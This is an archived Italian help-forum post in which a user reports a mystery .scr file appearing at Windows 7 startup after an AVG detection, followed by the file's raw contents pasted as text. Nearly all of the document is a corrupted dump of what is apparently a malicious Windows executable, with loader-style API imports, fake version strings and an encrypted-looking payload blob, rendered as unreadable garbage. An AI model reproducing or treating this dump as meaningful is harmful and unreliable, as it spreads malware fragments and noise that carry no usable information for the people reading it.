PDA

View Full Version : File .scr che si apre all'avvio di Windows 7

enrico123
13-02-2013, 09:21
Salve a tutti,

da ieri ho un problema all'avvio di 7: compare un file .scr (si apre col notepad) che non ho idea da dove possa arrivare... per il resto, il pc va bene e non noto nulla di anomalo!

Segnalo anche che AVG aveva rilevato e corretto qualcosa

http://img809.imageshack.us/img809/5236/immaginehzo.jpg


Il file .scr il seguente, io non riesco a capirci nulla :)

Cosa posso fare per eliminarlo? Ho gi controllato in msconfig ma non c' nulla di anomalo tra le applicazioni in avvio automatico!



MZ   @  !L!This program cannot be run in DOS mode.

$ 5Nq| q| q| q| r| q|!}| c3r| c6p| z&p| Richq| PE L VQ   " L/  @ @     0  P       h@ ( ` @ 4 .text "  "  `.rdata  @  & @ @.data 9
P  ( @ .rsrc ` * @ @ U E- EM MU;U u]UE} uUU E E]U E EM MU;U u]UE} kGt E }E
E} E]UE EP @@ 3Ƀ]UEn E E EEt UUEl E]UEA E EEMQ9EsE UU+E MMEF ]U E@ } uEM} u3 UEMMU UEMUEEt M;MuEk } u
U 3vEEE MUEEM MUEMUEE;u#} u E MA UEE} uE 뚋]UE E8 hT@ E PMQ ]UDEL
EEE! E E E E M3ҊtE3Ɋ  UUE] E3Ɋu} tU E3 Ec M3Ҋ+t E3Ɋ-uU33Ƀ-MUUE } uSE3Ɋ0t E
<U3Bxt
M3ҊQXuE EEE MM<E }u/U30u#M3ҊQxt
E3ɊHXu UU EEM3ҊthE E3ɊME }ar Uȃ Uȃ}Ar Eȃ7E}0r}9v"Mȃ0MȋU;UrEEEȉEE } tM UE
} t
E؉EMME]UQE4 j
j EP ]UE EP
P@ Q@@ T@ E 3] UE8 EP@@ P@ EL 3] UE EPE =T@ u7E 2.MT M}> }UT UE ]UE5 EP\E =P@ u025M M}% }U UE
E ]U E E Er h P@ 4S@ PWEE }  Dž|e MME }u{Dž< UR%% tQDž0\ Dž4 4 44[B }4 4Dž,Z Dž85 Džd! }u{Dž( UR7% tQDž  Dž_ _ 4C }_ Dž Dž$9 E) }u)Dž URP@ PT@ dS@ Dž' DžpP }u#Dž < MQdS@ DS@ Dž E }uURdS@ `S@ E̐ }uEPdS@ HS@ Dž@W }uMQdS@ S@ E. }uURP@ PT@ S@ E } uMQP@ RT@ T@ E* }
uEP
P@ QT@ T@ E } uURP@ PT@ T@ EV } uMQP@ RT@ @S@ Džt
}
uEP
P@ QT@ S@ EH }uURP@ PT@ DP@ E4 }uMQP@ RT@ V@ DžD }uEP
P@ QT@ T@ E$ }uURP@ PT@ @P@ E }uMQDS@ RT@ 0S@ E: }uEP
P@ QT@ 8S@ E^ }uURP@ PT@ T@ DžxN }uMQP@ RT@ (S@ EȄ }uEP
P@ QT@ S@ DžHi }uURP@ PT@ V@ E }uMQP@ RT@ \S@ EI }uEP
P@ QT@ T@ E[ }uURP@ PT@ LS@ Džh }uMQP@ RT@ V@ E] }uEP
P@ QT@ *T@ DžT }uURP@ PT@ V@ Dž\ }uMQP@ RT@ XS@ DžPe DžL }$uEP
P@ QT@ V@ Dž`L }%uURP@ PT@ T@ Džln }&uMQP@ RT@ TP@ E }'uEP
P@ QT@ V@ E^ }(uURS@ PT@ <P@ E8 })uMQHS@ RT@ T@ DžX }*uEP
HS@ QT@ ,S@ E }+uURP@ PT@ 8P@ En },uMQP@ RT@ hS@ E
}-uEP
P@ QT@ $S@ E hP@ j EO3] UE& 3*T@ uE% j  @@ E[ 
E' ] UEQ 3*PS@ 3= 
T@ Eu 3] UE6 j jhPS@ @@ P@@ P@@ Ef  ] U E EPj j hB@ j j  @@ EjMQ@@ E
URj j h@ j j  @@ EjEP@@ E j E, 2]UEa s% uE4 j  @@ E} E+ 3] UEV@ ]UV@ MH<
4P@ ]Uh P@ hS@ j j jj j j j hT@ T@ ]U4P@ H4Q P@ R0S@ ]Uj@h 0 4P@ HPQ4P@ B4P
P@ Q@P@ ]Uj 4P@ HTQUR4P@ H4Q P@ RT@ ]UV@ H<U k(U
0P@ ]Uj 0P@ HQ0P@ EBP
4P@ Q40P@ P R
P@ QT@ ]UhXP@ $P@ P@S@ ]U4P@ H44P@ J(
Q@ ]UhXP@ $P@ PT@ ]U$P@ PS@ ]U E EPV@ S@ D j(jjW8S@ XP@ ?  j7j j DP@ MQAj*jj DP@ UR6jj7j DP@ 8jOjj DP@ OjGj?j DP@ YE EPV@ MQkj?j j 8S@ E UU4P@ 3fH9M}2jWjNS@ UREPMjjST@ MQYj j(jR8S@ j9jVS@ jGjS@ jjjR8S@ j%jS@ ]Uj1j(j08S@ EPV@ j8j>S@ ]Uj j[jI8S@ } t$jKj8jc8S@ EPj5j4j DP@ ]UQjjj DP@ } uj:j`S@ E E1 EPV@ MQj T@ ]Uj]jJT@ 3f@T@ PM Qj DP@ Ej)jTT@ } tUjVjj DP@ URj V@ Ej jS@ EPj T@ V@ jHjS@ M
V@ jWjAS@ 2]UjLjj DP@ <T@ PCjBj:T@
V@ 
V@  j'jET@ E j,j^T@ V@ RS@ jdjj"8S@ E jjCj?8S@ <T@ PE MQV@ V@ S@ W@ jQj2jS8S@ W@ PEEM
W@ jj8j DP@ E UUS@ 9E j
j#j8S@ M yIAukj<j1jZ8S@ U<T@ LQj
jRj DP@ E UUE;V@ s!
W@ MV@ UMMWE
URV@ EW@ jj#j DP@ ]U, W*,]@ @ 3
0]@ @ 3E URV@ ƅ Dž EMƅ j!jj68S@ Dž   s
DžT PV@ Dž Dž   s>;Uu
Dž E
jjj DP@ Dž Dž   szȋ3ҹ  

kjQjQj DP@ Dž Dž ;U  3ҹ  3ҹ  Dž RV@ j\jj DP@ 
3ҹ  Uj_j2jF8S@ UjRj7j8S@ M3ЋM_]U j j7jY8S@ jYj5S@ E EPV@ j T@ E+ MQV@ URhH@@ jj h8@@ ,S@ EjjSj DP@ }  E% EPV@ j6jdj DP@ MQUMQPPjjS@ URhX@@ EUREEX EPV@ } |Hj
j+T@ jM QUMQPEE URV@ EURQj8j*j DP@ j-jj8S@ EURQj;j&T@ ]UE EEER M tEM EEM M EU U E E]UE> EPV@
<T@ QWj'jOT@ V@ V@  jOj/j DP@ V@ P
P@ QCjcjVS@ jhT@ XS@ jj^j28S@ jjj DP@ P@ RPP@ P
W@ Q W@ R&j jMj DP@ h hT@ j $S@ j jKj88S@ W@ PxjdjRj DP@
V@  E URV@ <T@ PN%  jWj S@
P@ Q6PP@ RV@ P
V@ Qsj;j>j DP@ V@ RhW@ V@ P
V@ Qj h V@ j-j]j DP@ hW@ h[@ 8P@ j0jj DP@ j jhY@ j <P@ j jbj DP@ h[@ hY@ hS@ j j]j DP@ hY@ hT@ AjIj\j$8S@ 3] U$Eo 3f@T@ P3f
<T@ Qj ,@@ EE } t[EP URj (@@ EE: EPj $@@ TS@ EH M
4S@ Ee 4S@ TS@  E< 3] UE E|u,E UU BWu E E 2 E$ 2]U0ET E4]@ E E EE}d EB
4S@ QUR:ET EPMQMEl URPEP*% u!E MQ4S@ RE@ E E8]@ Ed WE' 3] U(E E% PM Qj ,@@ EE2 } t_Ea URj (@@ EE[ EPj $@@ TS@ E M؉
4S@ E 4S@ TS@  E  E, 2]UE V@ P
LP@ Q=PP@ E> 3] UDEW ELP@ 
LP@ 
LP@ =LP@ e E V@ V@ V@ =V@   E EPj j h-@ j j  @@ EjMQ@@ 3ҊPP@ u}EP 4S@ PEEЈ
@T@ ;
LP@ uE V@ <T@ Ex SEU E% yH@uE
LP@
@T@ E E Ee E ]U0E EPj j h@ j j  @@ EjMQ@@ E\ j EV URj j hk+@ j j  @@ EjEP@@ E< j E j E hV@ j j h<)@ j j *T@ T@ E
j
T@ QV@ Ed 3] @ @ @ @
A A 2A DA ZA jA |A A  F F  F@ A @ @ @ @ @
A A 2A DA ZA jA |A A GetFileAttributesW >GetProcAddress LoadLibraryA } ExitProcess ReadProcessMemory GetCurrentProcess D CreateProcessA WaitForSingleObject J CreateThread SizeofResource LoadResource FindResourceA KERNEL32.dll ` $]@ (]@ | |    0  H  `  x    0
  H
   `
  x





     8  P  h                (  @  X  p    *       *     0  H  `  x               * 8  P  h                (  @  X  p    *            0  H  `  x                8  P  h                (  @  X  p    *            0  H  `  x                8  P  h                (  @  X  p    *            0  H  `  x        
     
 8  P  h                (  @  X  p    *         !  " 0 # H $ ` % x &  '  (  )  *  +  ,  - 8 . P / h 0  1  2  3  4  5  6  7 ( 8 @ 9 X : p ;  < * =  >  ?  @  A  B 0 C H D ` E x F  G  H  I  J  K  L M 8 N P O h P Q R S T U V ! W (! X @! Y X! Z p! [ ! \ *! ] ! ^ ! _ ! ` " a " b 0" c H" d `" e x" f " g " h " i " j " k # l # m 8# n P# o h# p # q # r # s # t # u # v $ w ($ x @$ y X$ z p$ { $ | *$ } $ ~ $  $  %  %  0%  H%  `%  x%  %  %  %  %  %  &  &  8&  P&  h&  &  &  &  &  &  &  '  ('  @'  X'  p'  '  *'  '  '  ' * (  (  0(  H(  `(  x(  (  (  (  (  (  )  ) * 8)  P)  h)  )  )  )  )  )  )  *  (*  @*  X*  p*  *  **  *  *  *  +  +  0+  H+  `+  x+  +  +  +  +  +  ,  ,  8,  P,  h,  ,  ,  ,  ,  ,  ,  -  (-  @-  X-  p-  -  *-  -  -  -  .  .  0.  H.  `.  x.  .  .  .  .  .  /  /  8/  P/  h/  /  /  /  /  /  /  0  (0  @0  X0  p0  0  *0  0  0  0  1  1  01  H1  `1  x1  1  1  1  1
 1  2  2
 82  P2  h2  2  2  2  2  2  2  3  (3  @3  X3    p3    3    3    *3    3    3    3    3    3    4    4    4    04    @4    P4    `4    p4    4    4    *4    4    4    4    4    4    5    5    5    05    @5    P5    `5    p5    5    5    *5    5    5    5    5    5    6    6    6    06    @6    P6    `6    p6    6    6    *6    6    6    6    6    6    7    7    7    07    @7    P7    `7    p7    7    7    *7    7    7    7    7    7    8    8    8    08    @8    P8    `8    p8    8    8    *8    8    8    8    8    8    9    9    9    09    @9    P9    `9    p9    9    9    *9    9    9    9    9    9    :    :    :    0:    @:    P:    `:    p:    :    :    *:    :    :    :    :    :    ;    ;    ;    0;    @;    P;    `;    p;    ;    ;    *;    ;    ;    ;    ;    ;    <    <    <    0<    @<    P<    `<    p<    <    <    *<    <    <    <    <    <    =    =    =    0=    @=    P=    `=    p=    =    =    *=    =    =    =    =    =    >    >    >    0>    @>    P>    `>    p>    >    >    *>    >    >    >    >    >    ?    ?    ?    0?    @?    P?    `?    p?    ?    ?    *?    ?    ?    ?    ?    ?    @    @    @    0@    @@    P@    `@    p@    @    @    *@    @    @    @    @    @    A    A    A    0A    @A    PA    `A    pA    A    A    *A    A    A    A    A    A    B    B    B    0B    @B    PB    `B    pB    B    B    *B    B    B    B    B    B    C    C    C    0C    @C    PC    `C    pC    C    C    *C    C    C    C    C    C    D    D    D    0D    @D    PD    `D    pD    D    D    *D    D    D    D    D    D    E    E    E    0E    @E    PE    `E    pE    E    E    *E    E    E    E    E    E    F    F    F    0F    @F    PF    `F    pF    F    F    *F    F    F    F    F    F    G    G    G    0G    @G    PG    `G    pG    G    G    *G    G    G    G    G    G    H    H    H    0H    @H    PH    `H    pH    H    H    *H    H    H    H    H    H    I    I    I    0I    @I    PI    `I    pI    I    I    *I    I    I    I    I    I    J    J    J    0J    @J    PJ    `J    pJ    J    J    *J    J    J    J    J    J    K    K    K    0K    @K    PK    `K    pK    K    K    *K    K    K    K    K    K    L    L    L    0L    @L    PL    `L    pL    L    L    *L    L    L    L    L     \        
   g  X
 d g 
 g  @
 L g 
 g  (
 4 g 
 g  
  g 
 g 
  g  l
 x g 
 g  T
 ` g 
 g  <
 H g 
 g  $
 0 g 
 g 
  g 
 g 
 g  h
 t g 
 g  P
 \ g 
 g  8
 D g 
 g 
 , g 
 * g  
  g  |
 g 
 g  d
 p g 
 g  L
 X g 
 g  4
 @ g 
 g  
 ( g 
 g  
  g  x
 g 
 g  `
 l g 
 g  H
 T g 
 g  0
 < g 
 g  
 $ g 
 g 
 g  t
 g 
 g  \
 h g 
 g  D
 P g 
 g  ,
 8 g  *
 g  
 g 
 g 
  g  p
 | g 
 g  X
 d g 
 g  @
 L g 
 g  (
 4 g 
 g  
  g 
 g 
  g  l
 x g 
 g  T
 ` g 
 g  <
 H g 
 g  $
 0 g 
 g 
  g 
 g 
 g  h
 t g 
 g  P
 \ g 
 g  8
 D g 
 g 
 , g 
 * g  
  g  |
 g 
 g  d
 p g 
 g  L
 X g 
 g  4
 @ g 
 g  
 ( g 
 g  
  g  x
 g 
 g  ` 
 l  g  
  g  H
 T g  
  g  0
 < g  
  g  
 $ g  
  g  
  g  t
  g  
  g  \
 h g  
  g  D
 P g  
  g  ,
 8 g  *
  g  
  g  
  g  
   g  p 
 |  g  
  g  X

 d
 g 


 g  @ 
 L  g  
  g  ( 
 4  g  
  g  

 
 g 


 g 

  g  l
 x g  
  g  T
 ` g  
  g  <
 H g  
  g  $
 0 g  
  g  
  g  
  g  
  g  h
 t g  
  g  P
 \ g  
  g  8
 D g  
  g  
 , g  
 * g  
  g  |
  g  
  g  d
 p g  
  g  L
 X g  
  g  4
 @ g  
  g  
 ( g  
  g  
  g  x
  g  
  g  `
 l g  
  g  H
 T g  
  g  0
 < g  
  g   
 $  g  
  g  !
 ! g  t!
 ! g  !
 ! g  \"
 h" g  "
 " g  D#
 P# g  #
 # g  ,$
 8$ g  *$
 $ g  %
 % g  %
 % g  %
 & g  p&
 |& g  &
 & g  X'
 d' g  '
 ' g  @(
 L( g  (
 ( g  ()
 4) g  )
 ) g  *
 * g  *
 ( 0 `     "2:< 80$  0 Y2pCR"[$^#\UwJg= T/<   8pB)eANSÜUŞTĝPJ?*/nVm@T.*  

   f8/g}ϲtԴeЬjѯkѰhЮcϫ^ͩ\̧YʤQ;~"\tC]2 
6M*
Z3
`7
`7 Z3O,?"+ 
p=<s̎׹ÖǑĄټsӴeϬ^ͨ]ͨ[˦P1q~K
l; , a7}M(d4s9z:{7w0n&a}Og=N+*  q<VY{շޱ՞ʇپtӴh*`ͩ]ͨVƟ0oyEV.  g:(bRZǢ\˦]̨]̧\˦ZɤUşM=&btEW0" ,
o=UI޳֡͑ÅٽxնhЮ^ΩFPU* >yG]|׹rӳvԵrӳkѯcϫ_Ω]ͨ\̧Uş?*Y o>B# !!!###  )#Q3pG9nvݳרў˓zն`ΪJ~P;)+"lAYѢͱԶخӟˍ{ָmѱeϬ_ͩ\̦I \ s?J' 222:::;;;;;;:::643B81E:1>D43X90tG;`Q}k~Ũ˰ʯwå^IW*L#xN8A2733:;;,TA+_mŤް՝ʌ׺tԴf*]̧=}I r= ;;;_``xyyyyyaabJB<V3]4\4]4b4zh6_m:Mr?CxE@{J@|KDxG?s@'SPN5~NnY4ND>hhh}To6igاѝ˔Ƃټf*HN s> &&&<<<uvvxxxND<]3e4e4e4e4e4e4f4f5f5g5f5g55QPQ:Oz^4RF?]q%uO7k\}ħѹ¢ĝѹȫjác̩JOs> ...===nnnpqqNE=\3e4e4e4e4e4e4e4e4e4e4e4g56QRS:Py^4RF?yzz***xyy9JAb:|GP#Y,`2d3d/a#W&`VœNPs> ...>>>gggijjOE=\3e4e4e4e4e4e4e4e4e4e4e4g57RUV:Qx^4SG@sttrrrBAA-.- l0 k4 n6 o8 p8 o8 n6n7WVQQs> ...===uuuwxxNE=]4f5e5e5e5e5e5e4e4e4e4e4h57RWX;Rx^4RF?AAA... u?
u@ xC{F}I}IzHp: XXSQs> ...===nnnpqqOF>_6i8h8h8h8h8h8h7h7h7h7h7i88SXZž;Sy`6SG@z{{***xxxAAA... p: YZURs> ...>>>gggijjOF?a9l;k;k;k;k;k;k;k;k;k;k;l:9TZž]ß<Uyb8THAtturrrAAA... p:!Y\XSt> ...===uuuwxxOE>c;n>m=n=n=n=n>m>m>m>m>m=n<:U\ß_ġ=Wzd:SG@@@@... p:!Y^žZSt> ...===nnnpqqPG?f=*p@p@p@p@p@p@p@p@p@p@*p@p?:V^ßaŢ>X{e;THAyz{***xyyAAA... p:"Y`ß\Tt= ...>>>gggijjQG@h?sB*rB*rB*rB*rB*rB*rB*rB*rB*rBrBrA;V_*cƣ>Y{g>TIBsstrrrAAA... p:"Za*^Tt= ...===uuuwxxPG?jBvFuEuEuEuEuEuEuEuEuFuFtC<W`ġeǤ?[|i?THA~~~@@@... p9"Zb*`žUt= ...===nnnppqQH@lDxHxHxHxHxHxHxHxHxHxHxHvE<XbŢgȦ?\}jATIBxxywwwAAA... p9"Zdġb*Vs= ...>>>gggiijRIAnFzJzJzJzJzJzJzJzJzJzJzJxH=XcŢiȧ@]}lCUJCqqrpppAAA... p9#ZeĢcġ Ws= ///===tuuvwwQG@*pH}M|M|M|M|M|M|M|M|M|M|MzI>Ydţjɨ@^}nDUIB}~~}}}@@@... p9#ZfŢeŢ Ws= ...===mmmoopRJCzT[[[[[[[[[[[U?[eƣkɩBauLVLEvwwvvv@@@... p9#[gţfţ!Xs= ...>>>fffhhhQLHlxwwvvvvvvvwl>aeţlʩ?ey_TPJppppopA@A... p9$[hţhƤ"Ys= ///=<<tttvvwDB@`RGjYKjYKjYKjYKjYKjYKjYKjYKjYKjYKkYKX]H1YgƤq*8k0uM,aEP{f*mys<B?*3/v6fNxD
u?t>t>p9$[hŤiƥ#Ys= ///===lllnooNGAlKwQwQwQwQwQwQwQwQwQwQwQvL;ZeţyԶjŤZPI{KzKu:_&kIsFxCt>p9 j1 b& X o8$[hŤiǦ#Zs> ///>>>eeegggSJC|T\\\\\\\\\\Š\*UA\bġhЮhЮoӲuӴyӵ{ѳ{̯wƨocSCs5f*\ S~KxDr;"YiƤjȦ$Zs> ///<<<ssstuuRIB}V^^^^^^^^^^Ì^*WA]dŢeϬ^ͨ^̨]̨^ͨaΪg*nұvն~ֹֺҶ{̮qäeWI|9m<ro˪jȦ$[s> ///===kllmnnSJCXÎaÎaÎaÎaÎaÎaÎaÎaÎaÎaŏaYC^nȧwնuԴvԵuԵqҲlѯfϬaΪ^ͨ\̨^ͨaΪe*iѯmұoѱpϯl˪m˪vӴhǥ%[s> ///===dddfffSKD[Ƒcđcđcđcđcđcđcđcđcđcǒd[Ga{̯Œęȝ*˟˛ɔŊ׺tԴkѯdϫ_ͩ]ͨ\ͨ]ͨ_Ωcϫdƣ&\s> ///<<<rrrsttRJC]ǔfƓfǔfǔfƔfƔfƓfƔfƔfǔfȔf^C^tƧŢ̬Ҳַټ֥ܳϗLjڿ{ָoҲgЬeϬeƤ&]s> ///=<<kkkllmSKD_ɖiȖiɖiɖiȖiȖiȖiȖiȖiȖiʖicMT8cI*w[sεǽܲեΖƍ~β-as= ///===cccdeeTLEb˙kʘkʘkʘkʘkʘkʘkʘkʘkʘkʘkǘke_[iXPT.wP9cOzbyɲ߷ثҢ͐Ի2ds= ///<<<qqqrssSKDd͜n˛m̛n̛n̛n̛n̛n̛n̛n̛n˛n̛n͛nΛn͛nʛmbLQDbwmD}a&jI*X=jR*{g*|ǮӾɰЮѨБռ1ds= ///<<<iii*kkkTLEgϞqΞqΞqΞqΞqΞpΞpΞpΞpΞpΞpΞpΞpΞqΞqϞqfUMFpopmon:A>K1 o6q9 v@|HQ*\7gFtVda$Yt> ///===aaa}}}~~~cccTMFg*rϟrϟrϟrϟrϟrϟrϟrϟrϟrϟrϟrϟrϟrϟr*rgUNGghhhhh?>?1*.o=S \ a% f+ l2p8s= wB{H~KzE wB ///;;;pppqrrSLEg*rϟrϟrϟrϟrϟrϟrϟrϟrϟrϟrϟrϟrϟrϟr*rgTMFtvvuuu===///D u?u?t>t> wBM5h U o7s= vA wB ///<<<hhh****ijjSLEg*rϟrϟrϟrϟrϟrϟrϟrϟrϟrϟrϟrϟrϟrϟr*rgTMFmmnmnn===/// wB
v@
u@ wB wB ///<<<```{|||||abbTMFgПqϟqϟqϟqϟqϟqϟqϟqϟqϟqϟqϟqϟqϟqϟqПqgUMFefffff>>>/// ///;;;ooopqqSLFpԧ|Ӧ|Ӧ|Ӧ|Ӧ|Ӧ|Ӧ|Ӧ|Ӧ|Ӧ|Ӧ|Ӧ|Ӧ|Ӧ|Ӧ|ԧ|pTNGsttstt<<</// 000:::`aaabbOKG{¥¥{PLGdddddd;;;/// 222555;;;>>>>>>;;;998OJFTOITOITOITOITOITOITOITOITOITOITOITOITOITOITOITOIOJF:98<<<??????<<<555222 333222111111111111122-/0-./-./-./-./-./-./-./-./-./-./-./-./-./-./-./-./-/0122111111111111222444 333333222222222222223/01/00/00/00/00/00/00/00/00/00/00/00/00/00/00/00/00/01223222222222222333333     | ? 8  8  8     @               ?         x          00     \4 V S _ V E R S I O N _ I N F O        ? (      S t r i n g F i l e I n f o   0 4 0 9 0 4 b 0 (   C o m m e n t s P r a s l i n ,   C o m p a n y N a m e H o u s e 4   F i l e D e s c r i p t i o n M a r k o 6  F i l e V e r s i o n 1 , 3 , 4 , 7 .   I n t e r n a l N a m e T r a v k a R   L e g a l C o p y r i g h t C o p y r i g h t M a m u z e 2 0 1 3 8   L e g a l T r a d e m a r k s F i o k a " :  O r i g i n a l F i l e n a m e V o d a . e x e 0   P r i v a t e B u i l d R a i n b o w ,   P r o d u c t N a m e S u n c e :  P r o d u c t V e r s i o n 3 , 0 , 0 , 0 0   S p e c i a l B u i l d K o t l i n a D  V a r F i l e I n f o $  T r a n s l a t i o n 338P̻¾~̗*¿µ̜±ɑ̾Ĵ~ǹ~̿~ø~̗ĝż̧¹ĵ*¿Ý̓µĵ*¿ç̣Ĥµĵ̗Ĥµĵ̢Žµ̖ÿ³̜ÿ³̣ʵÿ³̦ű̞ĥǟĹ̓ĹŵŷƵ̧Ė”ŷƵ̢*¿Ý̓µĵø̝ż̟Ĕŷ¹̓õ̕ȹ*¿̗ēµ*¿̓µĵµ̧Ė£̣Ė¹ĵç̙ĵ¾ğ̙ĵ¾ğ¼̙ĵ¾Ģ̔ĵ¼̙ĵ¾ēõ̗µ̗̣ĥȳĹĵ̝żĹĵ̣ģ*ĸ̓Ĺʵ̓µĵı̼³ɧ̼³ħ̗ĝżPA200PsNGbzNYwLdPA0PAD3ߨG޼8NJ0Ev,߃4cgsJQf*Aa1r܊uw!aJ'Rh]ZSl$+$kLb1rN5/P\DOCUME~1\PA. B(Nb_5ND
d+W9לKw1-
c|[D4Qmzt f*<*^_#k6l3
u'PUME~1\lissPAQA̅ZԆM9w$\5ENPYJWJZWRɂ`\0
u2ﹻv2(SE7-ׇ\i}zdS
wPystemRoot=PA}twCM""0*BӇ ެpК*[
L/:GkKD7!~{G)~@xѥ7 XVxj
:K P: SrcDosPaPA[/yoolLyM+u R>$`U2R*'_VZ5#sʌT'W*? -Y~AkAC%PESSIONNAMEPA t׋߆7 +ĞXu kg*>- W QHe2"#kR#!Kҟ3.e#URs)\.L$ubxTQP ProgramFiPAͿݏGD#_"vjh]ܚ;KGR-`Mg1.-Ax0zR7EfrRx*e(})~N>RعP_LEVEL=6 PPAփ7u5l*[Cct@*쑫NE %ɆY˒KhXu6В_v<UݝXn%{Y`Q2uE;yƢ|vK8:5Pepping 9, PARc
 ӣ79|7ϓb|pZ
9D;>hgv][Qz}ψ xK t[d䬶g# ڛ>^lPNTIFIER=x8PAݨ +"
أq,ݵ?YE/eIتRf_`կXI*FH]i^yOJGـ^RTMiqk#.o[PR_ARCHITECPALnUL^|ܛ(d^EfhQ0 b"QFz@ڲ<C֪nrt'njʼuqEi%`0~ Al}n .fw$P.VBE;.JS;.PA*] Ĭ?f2Rie]aI4|cuU~ơ}jE`kYQ7w3휩hՊݍq\;@,H >PATHEXT=.COPA{xxuBN?|, ,#wphgXIe]'YkoJG9Ddj3Y[
C4vДjZ({y!ȣPm;C:\ProgrPAؚ%xc@^ӡC<5WۨQu3{ MT?s$+PHes*DuClp\e { rrq0&܋/cP\WINDOWS;CPAc h2ut r_vbɦ9䇱j{`
ۀ]fx4a8cQj?=<L00Լ$`{a
wh kD*nPPs_NT Path=PAy@,ܕ̊xyL L~wӴB4rOWBCZ¸WP^]}L}s#]E~dZcib"PNUMBER_OF_PAHހ͞yQp&.f Ϟ_oj"|"5o΋8};Iy *$BE*ԌUs_tm 7fPs LOGONSERPAȈ@܇6<=}uUw 7B8"$nP郞ex]0j#5a7! _y
,I9hSV϶Ԅdǫ7diPATH=\DocumPA1/JtכPE*9pGǘR3
}3^47uD݇h6|w**o[V`+ɴ*xǶ1A-vbZ{"]PHOST_CHECKPAe` 9:.$a=&U4Lad10+YuxeBi<]PDcHw<aױPg񞏄8懶0P\WINDOWS\sPA39TOз('|.dU"p'qPzOL@u<ŶezQ&f0+&κ!0RVZ@)G*P49.8z5PRNAME=LIZZPAزXT/'xª=J)^ljCWGHߚh^5Wxl(f: wzt+b早Vz6+qk'ڃ@^8~8,Pogram FilePA
\Ky1O\*s *T&%*و?&#"Բ7 &hzAa.{Dۉ` f[hU\xLwWa] GPConsole CoPA`0Y9=%qb(kDL h+zc,BB*k~=:zXͮQ~>0ް)fപr@Psss\ApplicPAuÈ1#(4AV4ܹMi25XvI [g2#>
*;*Gi>/xIY&U^*M
;a%PATA=C:\DocPA1!cdS7ډFI<MYo%14|S:c S8e^;( \#4(^j;B5QS! dΥPents and SPA 8^*
dO\lN󈘯_
c YVƚ^T1{, Jw}8F >FSo'jsJ:=,7(P> > ALPAdw&HQދ*=Gvl _>1HPcw?|!w4
/-PO[Abq1<}*Vo(0KbLP PAbu$9kP\˶F/&+b%yrv!Q/& *ʆ3DyĪ{>=3a
<w_/2=L,C(P PA@4?^_ XE9ʈf*~I!
* $- (V<0XuXz2` C
^]/lmdx6X9E{V&G JP PAV)a)W^*\aF Oyΰ3*W<p* c|,,]Ji0c JI ?6ThPZ0>#h45P PA_M!Ѻ u^~9eAaf%}˸wHosJPdR k-1:N 5Mw3_F !7VXrP PA^4BUW&(\3%Z&VidžR\+\y
&#~Syӱt֍'_ v5S$D3u!bP PA49z-<-Ĝxs wzRq=Mp։믂$
Cf=;,3nj5NI^zR?*L "3-"P PAQt%.eMد)z*_cHc"",.O1LZOqTĕ(P
 gUp7pR:,4㜝*MVX#Ԧ뙀P PAlqx
#ETL5ݮ?o=_$xrTg d۰}D{f1
^`ƺ&4arNuaP PAj,
϶Dϕ/w҆7; J[ɂ^KHDAo<aڒGEJ<*xEǀd4Opaa orȻ&|cT pP PAGm}k9Kʂ<~c"`K
ai-ߋ~>fv
_8+15Yn k(KU!tP8kJ<2SP PA B<VN/u:2.ڀe[9=$ krӧ
꺷ë(MJy/kN(Q
[Ӹy0 :111t* ,.q Aɳ[qP PA*s~v4/%Z//zۛCpx57*lb 9ͷ$sP޲NStD=R;*MRረN(!r,:bpP PAhk:pA͔3ǣ|17|kjT#܃V bh*ΨS)g9Huz>lZ/`|NIP PAV7734V›~gs@Gvd_i~1YU4ns%&cN9!FCnN);͛;zWL7f)YVP PAC9 o =*ѳ<ٿcfc 5s[#>fbwkLD{iaɡJ0H~}Z~P PA^ƒvoPz{uz ZR]79M:R_?Z&X&n,gAp4?Ck Nҁ` ɸswKP PAPXEn;)JqN {b%XJFܢF0O\oMJ*F׈N[9
B+}^S.ED
ؼAaaL{{T k9P PA
wU2uP#/Loc"<"4~[mG>Wh0|l{(cScԛ Zx=o:P PA(),Ƅ6 6Ѽ4a@-QD7+`a[GGtP4 B,ɈAǯY1OH@/-p;F*P PA g^*<zq^ e*Y8Ig/o4M^w§V "L BL&x@?˩;A  l`QҪP PAD憕Y
͏3΁be9M ش*!݃+.Nu!r\*ǯ-+*z՛]hx&@KwN> >"e @ 4]P PA)chnA\C~U.%o{Fx$As+eYIoy,7E|X*©.IRN6 ePGfP PAF{ʙ+YߌVIdV}N08_\j..|e2
^s]n;Ѻn7N|;pQ,Y=[n:T=M(/P PA_9:NMe*%tgVR459Ǖ0dw\vC#zh svTW_o`ꆿ=dNK1 vGP PA:*mu!*_gRWaP*mJ*pH*װ1xW* ZnC]7Lj6N*27L'1 ~KF:
а\JP PA4okoSh3N~yPHY??6('eTC5@En<lP$2*G?iOG|趉Gq0P PAyv<HDE*a, ý
(IH%[uJDLpp*J:PRΙ9oTŸ9 EkT@,s#QuP PA 9J~-_H]fm|@0fS5V*EOkPSDݤ,_9yZ͆9*<|}UP PAv!6[D@E[!:/>bz,6A5qYjE]F}FC^t B{u1QJZޚYnaհPFNͩ*FP PAϺ
L7ud4Y?^v2e|]q\*}e/isP<7t_Yp;FH7G YJ-k#x<
0{dP PAVAdRg>ӛjTm":"7YReyMM 3;} #7$ytM]
췱>P PA@&go|85}_T,+
3_hM<{uj2DŐl"ma[([e
Q)X,o[Zm!VH_a܅'Ba}P PAѽ{=ۘ*cF/{%*`E'T5ݛB<*Id<?Gc\yc- 5D t7iYXN3G6[PIJ/P PAb~^/#%A OAM5ƅ,C
F*&bㆢ1@.*_jB %op|x|7-ۋ0`F{_J>#P PA6;NDJB8Kw1A>98,~
)シG1Vm6`Ё*1`6)@C}I˰|''d]xΫ2P PAUAm=~dWn:`y*gYj"Hah1v*m7U`>դGXחIN|us4͓Һ US"qoP PA|U'TW@Z!<WJ-OJY1:3@*i)Ao@{^*hK |e}-p`d]
]ě>&'d+櫱i{OHP PA4aRQ5[f^fO+gF J ԜrAw嫄U5F*r4gD*v 5nC1g; Bo?kԜnP PAl]bT,;#oLL,2ұ%f~|T5 :Vo".؈Q!}WT3E"HX
u(
}^H*+{fP PALZgP c,.A=4ZE*W3N*ȲJ(e"?{a &B IVV4H1-T
-4P PAe3J+̻fwrGCf'@XK͋_;
w_]7LQ O@ #EiX= 7.pP PA4>Sӕ
Y~Lg*@O-ok [M6<y)y^?nPwf$; 7>y f
ć@ξG"bi.P PAH[U5=f;'V_͹tNΊ%1
F>dC]Gϟ8*e
>)nGS@h2*PTõ^3
